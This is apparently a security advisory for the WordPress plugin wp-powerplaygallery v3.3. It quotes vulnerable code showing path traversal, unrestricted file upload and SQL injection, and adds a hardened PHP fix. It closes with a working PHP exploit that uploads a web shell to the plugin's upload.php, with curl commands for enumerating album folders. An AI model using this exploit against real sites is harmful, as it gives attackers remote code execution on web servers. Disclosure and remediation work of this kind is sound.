Title: Remote file upload vulnerability & Blind SQLi in WordPress plugin wp-powerplaygallery v3.3
1. Ability to create directories outside of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of upload.php don't verify what types of files are allowed or where they should be placed:

138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }

3. SQL injection
Lines 131-135 of upload.php fail to handle user input appropriately, either by sanitizing or parameterizing it. The injection points are the albumid and name parameters, reachable via either GET or POST ($_REQUEST).

131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
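A hardened version of the three spots above, added here as an example and not taken from the plugin. It assumes it runs inside WordPress (absint, wp_upload_dir, wp_mkdir_p, sanitize_file_name, wp_check_filetype_and_ext, current_user_can, wp_die and $wpdb->prepare are core functions) and leaves out the plugin's chunked-upload and thumbnail handling.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress core is loaded.
function pp_secure_upload() {
    global $wpdb;

    // The original handler is reachable by anyone; require an upload capability first.
    if (!current_user_can('upload_files')) {
        wp_die('forbidden', '', 403);
    }

    // 3. SQL injection / 1. path traversal: albumid becomes a plain integer, so it can
    // neither carry SQL nor "../" into the directory name built from it.
    $album_id = absint($_REQUEST['albumid'] ?? 0);
    if ($album_id === 0) {
        wp_die('invalid album', '', 400);
    }

    // 1. Directory is derived from the uploads base dir plus the numeric id only.
    $upload = wp_upload_dir();
    $base   = realpath($upload['basedir']);
    $target = $base . "/power_play/{$album_id}_uploadfolder/big";
    if (!file_exists($target)) {
        wp_mkdir_p($target);
    }
    // Belt and braces: the resolved directory must still sit inside the uploads tree.
    if (strpos(realpath($target), $base . '/') !== 0) {
        wp_die('bad target directory', '', 400);
    }

    // 2. File name comes from the upload itself, not from $_REQUEST['name'], and the
    // content must match an allowed image type (extension and magic bytes checked).
    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($_FILES['file']['tmp_name'])) {
        wp_die('no file', '', 400);
    }
    $name    = sanitize_file_name($_FILES['file']['name']);
    $check   = wp_check_filetype_and_ext($_FILES['file']['tmp_name'], $name);
    $allowed = array('image/jpeg', 'image/png', 'image/gif');
    if (!$check['ext'] || !in_array($check['type'], $allowed, true)) {
        wp_die('file type not allowed', '', 415);
    }
    $final = $check['proper_filename'] ? $check['proper_filename'] : $name;
    $dest  = $target . '/' . $final;
    if (!move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        wp_die('could not store file', '', 500);
    }

    // 3. Every value reaches the query through prepare() placeholders (thumb = image here).
    $wpdb->query($wpdb->prepare(
        "INSERT INTO {$wpdb->prefix}pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date`) VALUES (%d, %s, %s, '', %s, %s, 1, '', NULL)",
        $album_id, $final, $final, $final, $final));
    return $dest;
}
```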
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

    $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";
    $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
?>